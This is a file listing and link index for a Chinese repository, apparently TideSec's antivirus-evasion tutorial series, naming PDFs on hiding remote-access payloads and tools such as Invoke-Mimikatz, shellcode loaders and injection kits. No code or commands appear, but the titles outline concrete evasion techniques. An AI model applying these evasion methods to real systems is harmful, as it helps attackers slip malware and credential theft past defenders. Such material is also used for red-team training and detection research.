├── 01.远控免杀专题(1)-基础篇.pdf
├── 02.远控免杀专题(2)-msfvenom隐藏的参数.pdf
├── 03.远控免杀专题(3)-msf自带免杀(VT免杀率35-69).pdf
├── 04.远控免杀专题(4)-Evasion模块免杀(VT免杀率12-71).pdf
├── 05.远控免杀专题(5)-Veil免杀(VT免杀率23-71).pdf
├── 06.远控免杀专题(6)-Venom免杀(VT免杀率11-71).pdf
├── 07.远控免杀专题(7)-Shellter免杀(VT免杀率7-69).pdf
├── 08.远控免杀专题(8)-BackDoor-Factory免杀(VT免杀率13-71).pdf
├── 09.远控免杀专题(9)-Avet免杀(VT免杀率17-71).pdf
├── 10.远控免杀专题(10)-TheFatRat免杀(VT免杀率22-70).pdf
├── 11.远控免杀专题(11)-Avoidz免杀(VT免杀率23-71).pdf
├── 12.远控免杀专题(12)-Green-Hat-Suite免杀(VT免杀率23-70).pdf
├── 13.远控免杀专题(13)-zirikatu免杀(VT免杀率39-71).pdf
├── 14.远控免杀专题(14)-AVIator免杀(VT免杀率25-69).pdf
├── 15.远控免杀专题(15)-DKMC免杀(VT免杀率8-55).pdf
├── 16.远控免杀专题(16)-Unicorn免杀(VT免杀率29-56).pdf
├── 17.远控免杀专题(17)-Python-Rootkit免杀(VT免杀率7-70).pdf
├── 18.远控免杀专题(18)-ASWCrypter免杀(VT免杀率19-57).pdf
├── 19.远控免杀专题(19)-nps_payload免杀(VT免杀率3-57).pdf
├── 20.远控免杀专题(20)-GreatSCT免杀(VT免杀率14-56).pdf
├── 21.远控免杀专题(21)-HERCULES免杀(VT免杀率29-70).pdf
├── 22.远控免杀专题(22)-SpookFlare免杀(VT免杀率16-67).pdf
├── 23.远控免杀专题(23)-SharpShooter免杀(VT免杀率22-57).pdf
├── 24.远控免杀专题(24)-CACTUSTORCH免杀(VT免杀率23-57).pdf
├── 25.远控免杀专题(25)-Winpayloads免杀(VT免杀率18-70).pdf
├── 26.远控免杀专题(26)-C、C++加载shellcode免杀(上)(VT免杀率9-70).pdf
├── 27.远控免杀专题(27)-C、C++加载shellcode免杀(中)(VT免杀率8-70).pdf
├── 28.远控免杀专题(28)-C、C++加载shellcode免杀(下)(VT免杀率3-71).pdf
├── 29.远控免杀专题(29)-C#加载shellcode免杀-5种方式(VT免杀率8-70).pdf
├── 30.远控免杀专题(30)-Python加载shellcode免杀-8种方式(VT免杀率10-69).pdf
├── 31.远控免杀专题(31)-powershell加载shellcode免杀-4种方式(VT免杀率5-58).pdf
├── 32.远控免杀专题(32)-Go加载shellcode免杀-3种方式(VT免杀率7-70).pdf
├── 33.远控免杀专题(33)-Ruby加载shellcode免杀(VT免杀率0-58).pdf
├── 34.远控免杀专题(34)-白名单MSBuild.exe执行payload(VT免杀率4-57).pdf
├── 35.远控免杀专题(35)-白名单Msiexec.exe执行payload(VT免杀率27-60).pdf
├── 36.远控免杀专题(36)-白名单InstallUtil.exe执行payload(VT免杀率3-68).pdf
├── 37.远控免杀专题(37)-白名单Mshta.exe执行payload(VT免杀率26-58).pdf
├── 38.远控免杀专题(38)-白名单Rundll32.exe执行payload(VT免杀率22-58).pdf
├── 39.远控免杀专题(39)-白名单Regsvr32.exe执行payload(VT免杀率18-58).pdf
├── 40.远控免杀专题(40)-白名单Cmstp.exe执行payload(VT查杀率为21-57).pdf
├── 41.远控免杀专题(41)-白名单Ftp.exe执行payload.pdf
├── 42.远控免杀专题(42)-白名单Regasm.exe-Regsvcs.exe执行payload.pdf
├── 43.远控免杀专题(43)-白名单Compiler.exe执行payload.pdf
├── 44.远控免杀专题(44)-白名单MavInject.exe执行payload.pdf
├── 45.远控免杀专题(45)-白名单presentationhost.exe执行payload.pdf
├── 46.远控免杀专题(46)-白名单IEexec.exe执行payload.pdf
├── 47.远控免杀专题(47)-白名单winrm.vbs、slmgr.vbs执行payload.pdf
├── 48.远控免杀专题(48)-白名单pubprn.vbs执行payload.pdf
├── 49.远控免杀专题(49)-白名单Xwizard.exe执行payload.pdf
├── 50.远控免杀专题(50)-白名单winword.exe执行payload.pdf
├── 51.远控免杀专题(51)-白名单msdeloy.exe执行payload.pdf
├── 52.远控免杀专题(52)-白名单psexec.exe执行payload.pdf
├── 53.远控免杀专题(53)-白名单WMIC.exe执行payload.pdf
├── 54.远控免杀专题(54)-白名单SyncAppvPublishingServer.vbs执行payload.pdf
├── 55.远控免杀专题(55)-白名单Pcalua.exe执行payload.pdf
├── 56.远控免杀专题(56)-白名单zipfldr.dll执行payload.pdf
├── 57.远控免杀专题(57)-白名单Url.dll执行payload.pdf
├── 58.远控免杀专题(58)-白名单DiskShadow.exe执行payload.pdf
├── 59.远控免杀专题(59)-白名单Odbcconf.exe执行payload.pdf
├── 60.远控免杀专题(60)-白名单Forfiles.exe执行payload.pdf
├── 61.远控免杀专题(61)-白名单Te.exe执行payload.pdf
├── 62.远控免杀专题(62)-白名单CScript.exe-WScript.exe执行payload.pdf
├── 63.远控免杀专题(63)-白名单InfDefaultInstall.exe执行payload.pdf
├── 64.远控免杀专题(64)-Msf自编译免杀补充.pdf
├── 65.远控免杀专题(65)-shellcode免杀实践.pdf
├── 66.远控免杀专题(66)-工具篇总结.pdf
├── 67.远控免杀专题(67)-白名单篇总结.pdf
├── 68.远控免杀专题(68)-Mimikatz免杀实践(上).pdf
├── 69.远控免杀专题(69)-Mimikatz免杀实践(下).pdf
├── 70.远控免杀专题(70)-终结篇.pdf
├── 71.远控免杀专题(71)-Donut免杀任意可执行文件(VT免杀率30-67).pdf
├── 72.远控免杀专题(72)-sRDI反射型DLL注入免杀(VT查杀率16-61).pdf
├── 73.远控免杀专题(73)-使用stager.dll的多种免杀方式(VT查杀率7-72).pdf
├── 74.远控免杀专题(74)-基于Go的条件触发式免杀(VT查杀率7-70).pdf
├── 75.远控免杀专题(75)-基于Go的沙箱检测(VT查杀率8-70).pdf
├── 76.远控免杀专题(76)-基于Go的各种API免杀测试.pdf
├── 77.远控免杀专题(77)-基于Go的免杀小结.pdf
├── README.md
├── images
├── 0.png
├── ewm.png
├── msnl01.png
├── msnl02.png
├── tide.png
└── tide2.png
└── tools
├── AVIator.zip
├── DotNetToJScript.zip
├── InstallUtil-Shellcode.cs
├── Invoke-Obfuscation.zip
├── ProcessInjection.zip
├── ReflectiveDLLInjection.zip
├── SharpCradle.zip
├── ShellcodeWrapper.zip
├── SimpleShellcodeInjector.zip
├── Veil-Catapult.tar.gz
├── Win恶意软件行为分析工具
├── Autoruns_v13.7.zip
├── IceSword122cn.zip
├── PCHunter_free_1.51.zip
├── PowerToolx32_v4.8.zip
├── PowerToolx64_v2.0.zip
├── ProcessExplorer_v16.20.zip
├── ProcessMonitor_v3.32.zip
├── Win64AST_1.10Beta7.zip
└── 火绒剑独立版 0.1.0.36.zip
├── avet.tar.gz
├── bat2exe.zip
├── bin2hex.exe
├── cmstp.inf
├── donut_v0.9.2_release.zip
├── encode_shellcode.py
├── go-shellcode.zip
├── green-hat-suite.tar.gz
├── gsl-sc-loader.zip
├── impacket.tar.gz
├── mimikatz
├── Convert-BinaryToString.ps1
├── Invoke-Mimikatz.ps1
├── Invoke-ReflectivePEInjection.ps1
├── Out-EncryptedScript.ps1
├── ResHacker.zip
├── executes-mimikatz.xml
├── katz.cs
├── mimikatz.js
├── mimikatz.msi
├── mimikatz.sct
├── mimikatz.xsl
├── mimikatz_trunk_2.2.0.zip
├── procdump.exe
├── procdump64.exe
├── shellcode_inject.rb
├── sigthief.py
└── xencrypt.ps1
├── mingw-w64-install.exe
├── msfvenom-zsh-completion.tar.gz
├── pe_to_shellcode.zip
├── powersct.sct
├── py2exe-0.6.9.win32-py2.7.exe
├── pyinstaller-3.5.zip
├── sRDI.zip
├── shellcode_launcher.zip
├── stager.dll.zip
├── unicorn.tar.gz
├── zirikatu.tar.gz
└── 自动化dll注入工具-Dll(IAT).exe.zip
/01.远控免杀专题(1)-基础篇.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/01.远控免杀专题(1)-基础篇.pdf
--------------------------------------------------------------------------------
/02.远控免杀专题(2)-msfvenom隐藏的参数.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/02.远控免杀专题(2)-msfvenom隐藏的参数.pdf
--------------------------------------------------------------------------------
/03.远控免杀专题(3)-msf自带免杀(VT免杀率35-69).pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/03.远控免杀专题(3)-msf自带免杀(VT免杀率35-69).pdf
--------------------------------------------------------------------------------
/04.远控免杀专题(4)-Evasion模块免杀(VT免杀率12-71).pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/04.远控免杀专题(4)-Evasion模块免杀(VT免杀率12-71).pdf
--------------------------------------------------------------------------------
/05.远控免杀专题(5)-Veil免杀(VT免杀率23-71).pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/05.远控免杀专题(5)-Veil免杀(VT免杀率23-71).pdf
--------------------------------------------------------------------------------
/06.远控免杀专题(6)-Venom免杀(VT免杀率11-71).pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/06.远控免杀专题(6)-Venom免杀(VT免杀率11-71).pdf
--------------------------------------------------------------------------------
/07.远控免杀专题(7)-Shellter免杀(VT免杀率7-69).pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/07.远控免杀专题(7)-Shellter免杀(VT免杀率7-69).pdf
--------------------------------------------------------------------------------
/08.远控免杀专题(8)-BackDoor-Factory免杀(VT免杀率13-71).pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/08.远控免杀专题(8)-BackDoor-Factory免杀(VT免杀率13-71).pdf
--------------------------------------------------------------------------------
/09.远控免杀专题(9)-Avet免杀(VT免杀率17-71).pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/09.远控免杀专题(9)-Avet免杀(VT免杀率17-71).pdf
--------------------------------------------------------------------------------
/10.远控免杀专题(10)-TheFatRat免杀(VT免杀率22-70).pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/10.远控免杀专题(10)-TheFatRat免杀(VT免杀率22-70).pdf
--------------------------------------------------------------------------------
/11.远控免杀专题(11)-Avoidz免杀(VT免杀率23-71).pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/11.远控免杀专题(11)-Avoidz免杀(VT免杀率23-71).pdf
--------------------------------------------------------------------------------
/12.远控免杀专题(12)-Green-Hat-Suite免杀(VT免杀率23-70).pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/12.远控免杀专题(12)-Green-Hat-Suite免杀(VT免杀率23-70).pdf
--------------------------------------------------------------------------------
/13.远控免杀专题(13)-zirikatu免杀(VT免杀率39-71).pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/13.远控免杀专题(13)-zirikatu免杀(VT免杀率39-71).pdf
--------------------------------------------------------------------------------
/14.远控免杀专题(14)-AVIator免杀(VT免杀率25-69).pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/14.远控免杀专题(14)-AVIator免杀(VT免杀率25-69).pdf
--------------------------------------------------------------------------------
/15.远控免杀专题(15)-DKMC免杀(VT免杀率8-55).pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/15.远控免杀专题(15)-DKMC免杀(VT免杀率8-55).pdf
--------------------------------------------------------------------------------
/16.远控免杀专题(16)-Unicorn免杀(VT免杀率29-56).pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/16.远控免杀专题(16)-Unicorn免杀(VT免杀率29-56).pdf
--------------------------------------------------------------------------------
/17.远控免杀专题(17)-Python-Rootkit免杀(VT免杀率7-70).pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/17.远控免杀专题(17)-Python-Rootkit免杀(VT免杀率7-70).pdf
--------------------------------------------------------------------------------
/18.远控免杀专题(18)-ASWCrypter免杀(VT免杀率19-57).pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/18.远控免杀专题(18)-ASWCrypter免杀(VT免杀率19-57).pdf
--------------------------------------------------------------------------------
/19.远控免杀专题(19)-nps_payload免杀(VT免杀率3-57).pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/19.远控免杀专题(19)-nps_payload免杀(VT免杀率3-57).pdf
--------------------------------------------------------------------------------
/20.远控免杀专题(20)-GreatSCT免杀(VT免杀率14-56).pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/20.远控免杀专题(20)-GreatSCT免杀(VT免杀率14-56).pdf
--------------------------------------------------------------------------------
/21.远控免杀专题(21)-HERCULES免杀(VT免杀率29-70).pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/21.远控免杀专题(21)-HERCULES免杀(VT免杀率29-70).pdf
--------------------------------------------------------------------------------
/22.远控免杀专题(22)-SpookFlare免杀(VT免杀率16-67).pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/22.远控免杀专题(22)-SpookFlare免杀(VT免杀率16-67).pdf
--------------------------------------------------------------------------------
/23.远控免杀专题(23)-SharpShooter免杀(VT免杀率22-57).pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/23.远控免杀专题(23)-SharpShooter免杀(VT免杀率22-57).pdf
--------------------------------------------------------------------------------
/24.远控免杀专题(24)-CACTUSTORCH免杀(VT免杀率23-57).pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/24.远控免杀专题(24)-CACTUSTORCH免杀(VT免杀率23-57).pdf
--------------------------------------------------------------------------------
/25.远控免杀专题(25)-Winpayloads免杀(VT免杀率18-70).pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/25.远控免杀专题(25)-Winpayloads免杀(VT免杀率18-70).pdf
--------------------------------------------------------------------------------
/26.远控免杀专题(26)-C、C++加载shellcode免杀(上)(VT免杀率9-70).pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/26.远控免杀专题(26)-C、C++加载shellcode免杀(上)(VT免杀率9-70).pdf
--------------------------------------------------------------------------------
/27.远控免杀专题(27)-C、C++加载shellcode免杀(中)(VT免杀率8-70).pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/27.远控免杀专题(27)-C、C++加载shellcode免杀(中)(VT免杀率8-70).pdf
--------------------------------------------------------------------------------
/28.远控免杀专题(28)-C、C++加载shellcode免杀(下)(VT免杀率3-71).pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/28.远控免杀专题(28)-C、C++加载shellcode免杀(下)(VT免杀率3-71).pdf
--------------------------------------------------------------------------------
/29.远控免杀专题(29)-C#加载shellcode免杀-5种方式(VT免杀率8-70).pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/29.远控免杀专题(29)-C#加载shellcode免杀-5种方式(VT免杀率8-70).pdf
--------------------------------------------------------------------------------
/30.远控免杀专题(30)-Python加载shellcode免杀-8种方式(VT免杀率10-69).pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/30.远控免杀专题(30)-Python加载shellcode免杀-8种方式(VT免杀率10-69).pdf
--------------------------------------------------------------------------------
/31.远控免杀专题(31)-powershell加载shellcode免杀-4种方式(VT免杀率5-58).pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/31.远控免杀专题(31)-powershell加载shellcode免杀-4种方式(VT免杀率5-58).pdf
--------------------------------------------------------------------------------
/32.远控免杀专题(32)-Go加载shellcode免杀-3种方式(VT免杀率7-70).pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/32.远控免杀专题(32)-Go加载shellcode免杀-3种方式(VT免杀率7-70).pdf
--------------------------------------------------------------------------------
/33.远控免杀专题(33)-Ruby加载shellcode免杀(VT免杀率0-58).pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/33.远控免杀专题(33)-Ruby加载shellcode免杀(VT免杀率0-58).pdf
--------------------------------------------------------------------------------
/34.远控免杀专题(34)-白名单MSBuild.exe执行payload(VT免杀率4-57).pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/34.远控免杀专题(34)-白名单MSBuild.exe执行payload(VT免杀率4-57).pdf
--------------------------------------------------------------------------------
/35.远控免杀专题(35)-白名单Msiexec.exe执行payload(VT免杀率27-60).pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/35.远控免杀专题(35)-白名单Msiexec.exe执行payload(VT免杀率27-60).pdf
--------------------------------------------------------------------------------
/36.远控免杀专题(36)-白名单InstallUtil.exe执行payload(VT免杀率3-68).pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/36.远控免杀专题(36)-白名单InstallUtil.exe执行payload(VT免杀率3-68).pdf
--------------------------------------------------------------------------------
/37.远控免杀专题(37)-白名单Mshta.exe执行payload(VT免杀率26-58).pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/37.远控免杀专题(37)-白名单Mshta.exe执行payload(VT免杀率26-58).pdf
--------------------------------------------------------------------------------
/38.远控免杀专题(38)-白名单Rundll32.exe执行payload(VT免杀率22-58).pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/38.远控免杀专题(38)-白名单Rundll32.exe执行payload(VT免杀率22-58).pdf
--------------------------------------------------------------------------------
/39.远控免杀专题(39)-白名单Regsvr32.exe执行payload(VT免杀率18-58).pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/39.远控免杀专题(39)-白名单Regsvr32.exe执行payload(VT免杀率18-58).pdf
--------------------------------------------------------------------------------
/40.远控免杀专题(40)-白名单Cmstp.exe执行payload(VT查杀率为21-57).pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/40.远控免杀专题(40)-白名单Cmstp.exe执行payload(VT查杀率为21-57).pdf
--------------------------------------------------------------------------------
/41.远控免杀专题(41)-白名单Ftp.exe执行payload.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/41.远控免杀专题(41)-白名单Ftp.exe执行payload.pdf
--------------------------------------------------------------------------------
/42.远控免杀专题(42)-白名单Regasm.exe-Regsvcs.exe执行payload.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/42.远控免杀专题(42)-白名单Regasm.exe-Regsvcs.exe执行payload.pdf
--------------------------------------------------------------------------------
/43.远控免杀专题(43)-白名单Compiler.exe执行payload.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/43.远控免杀专题(43)-白名单Compiler.exe执行payload.pdf
--------------------------------------------------------------------------------
/44.远控免杀专题(44)-白名单MavInject.exe执行payload.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/44.远控免杀专题(44)-白名单MavInject.exe执行payload.pdf
--------------------------------------------------------------------------------
/45.远控免杀专题(45)-白名单presentationhost.exe执行payload.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/45.远控免杀专题(45)-白名单presentationhost.exe执行payload.pdf
--------------------------------------------------------------------------------
/46.远控免杀专题(46)-白名单IEexec.exe执行payload.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/46.远控免杀专题(46)-白名单IEexec.exe执行payload.pdf
--------------------------------------------------------------------------------
/47.远控免杀专题(47)-白名单winrm.vbs、slmgr.vbs执行payload.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/47.远控免杀专题(47)-白名单winrm.vbs、slmgr.vbs执行payload.pdf
--------------------------------------------------------------------------------
/48.远控免杀专题(48)-白名单pubprn.vbs执行payload.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/48.远控免杀专题(48)-白名单pubprn.vbs执行payload.pdf
--------------------------------------------------------------------------------
/49.远控免杀专题(49)-白名单Xwizard.exe执行payload.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/49.远控免杀专题(49)-白名单Xwizard.exe执行payload.pdf
--------------------------------------------------------------------------------
/50.远控免杀专题(50)-白名单winword.exe执行payload.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/50.远控免杀专题(50)-白名单winword.exe执行payload.pdf
--------------------------------------------------------------------------------
/51.远控免杀专题(51)-白名单msdeloy.exe执行payload.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/51.远控免杀专题(51)-白名单msdeloy.exe执行payload.pdf
--------------------------------------------------------------------------------
/52.远控免杀专题(52)-白名单psexec.exe执行payload.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/52.远控免杀专题(52)-白名单psexec.exe执行payload.pdf
--------------------------------------------------------------------------------
/53.远控免杀专题(53)-白名单WMIC.exe执行payload.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/53.远控免杀专题(53)-白名单WMIC.exe执行payload.pdf
--------------------------------------------------------------------------------
/54.远控免杀专题(54)-白名单SyncAppvPublishingServer.vbs执行payload.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/54.远控免杀专题(54)-白名单SyncAppvPublishingServer.vbs执行payload.pdf
--------------------------------------------------------------------------------
/55.远控免杀专题(55)-白名单Pcalua.exe执行payload.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/55.远控免杀专题(55)-白名单Pcalua.exe执行payload.pdf
--------------------------------------------------------------------------------
/56.远控免杀专题(56)-白名单zipfldr.dll执行payload.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/56.远控免杀专题(56)-白名单zipfldr.dll执行payload.pdf
--------------------------------------------------------------------------------
/57.远控免杀专题(57)-白名单Url.dll执行payload.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/57.远控免杀专题(57)-白名单Url.dll执行payload.pdf
--------------------------------------------------------------------------------
/58.远控免杀专题(58)-白名单DiskShadow.exe执行payload.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/58.远控免杀专题(58)-白名单DiskShadow.exe执行payload.pdf
--------------------------------------------------------------------------------
/59.远控免杀专题(59)-白名单Odbcconf.exe执行payload.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/59.远控免杀专题(59)-白名单Odbcconf.exe执行payload.pdf
--------------------------------------------------------------------------------
/60.远控免杀专题(60)-白名单Forfiles.exe执行payload.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/60.远控免杀专题(60)-白名单Forfiles.exe执行payload.pdf
--------------------------------------------------------------------------------
/61.远控免杀专题(61)-白名单Te.exe执行payload.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/61.远控免杀专题(61)-白名单Te.exe执行payload.pdf
--------------------------------------------------------------------------------
/62.远控免杀专题(62)-白名单CScript.exe-WScript.exe执行payload.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/62.远控免杀专题(62)-白名单CScript.exe-WScript.exe执行payload.pdf
--------------------------------------------------------------------------------
/63.远控免杀专题(63)-白名单InfDefaultInstall.exe执行payload.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/63.远控免杀专题(63)-白名单InfDefaultInstall.exe执行payload.pdf
--------------------------------------------------------------------------------
/64.远控免杀专题(64)-Msf自编译免杀补充.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/64.远控免杀专题(64)-Msf自编译免杀补充.pdf
--------------------------------------------------------------------------------
/65.远控免杀专题(65)-shellcode免杀实践.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/65.远控免杀专题(65)-shellcode免杀实践.pdf
--------------------------------------------------------------------------------
/66.远控免杀专题(66)-工具篇总结.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/66.远控免杀专题(66)-工具篇总结.pdf
--------------------------------------------------------------------------------
/67.远控免杀专题(67)-白名单篇总结.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/67.远控免杀专题(67)-白名单篇总结.pdf
--------------------------------------------------------------------------------
/68.远控免杀专题(68)-Mimikatz免杀实践(上).pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/68.远控免杀专题(68)-Mimikatz免杀实践(上).pdf
--------------------------------------------------------------------------------
/69.远控免杀专题(69)-Mimikatz免杀实践(下).pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/69.远控免杀专题(69)-Mimikatz免杀实践(下).pdf
